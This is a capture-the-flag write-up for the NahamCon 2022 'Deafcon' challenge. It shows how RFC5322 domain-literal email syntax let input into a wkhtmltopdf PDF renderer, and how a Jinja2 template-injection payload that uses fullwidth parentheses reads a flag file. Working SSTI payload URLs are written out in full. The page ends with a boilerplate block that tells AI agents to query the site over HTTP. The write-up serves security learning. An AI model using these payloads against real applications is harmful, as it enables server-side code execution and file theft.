# Deafcon The premise of this challenge was similar to [Hacker TS](/2022/nahamcon-ctf-2022/hacker-ts.md) - we had input that was rendered into a PDF using `wkhtmltopdf`. However, our payload had to fit the following constraints: * `name` validated for alphanumeric characters * `email` uses RFC5322 validation The `email` parameter is naturally more realistic to exploit, so I dived into [RFC5322](https://datatracker.ietf.org/doc/html/rfc5322#section-3.4.1) and found the part that specified the allowed characters. ``` addr-spec = local-part "@" domain local-part = dot-atom / quoted-string / obs-local-part domain = dot-atom / domain-literal / obs-domain domain-literal = [CFWS] "[" *([FWS] dtext) [FWS] "]" [CFWS] dtext = %d33-90 / ; Printable US-ASCII %d94-126 / ; characters not including obs-dtext ; "[", "]", or "\" ``` The `email` is made up of ``@`, and interestingly the `domain` allows for a `domain-literal` format - `[]`. This allows us, for example, to use the following payload: `http://challenge.nahamcon.com:31575/ticket?name=test&email=test@[

test

]` My teammate Enyei then found that this endpoint was also vulnerable to SSTI - it seems that the input is first rendered into a Jinja2 template before being passed to `wkhtmltopdf`. The following will render the email as `test@[49]`, for instance: `http://challenge.nahamcon.com:31575/ticket?name=test&email=test@[{{7*7}}]` At this point, we can craft a payload that reads the `flag.txt` file: `http://challenge.nahamcon.com:30555/ticket?name=a&email=a@[{{%20get_flashed_messages.__globals__.__builtins__.open%EF%BC%88%22flag.txt%22%EF%BC%89.read%EF%BC%88%EF%BC%89%20}}]` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ctf.zeyu2001.com/2022/nahamcon-ctf-2022/deafcon.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.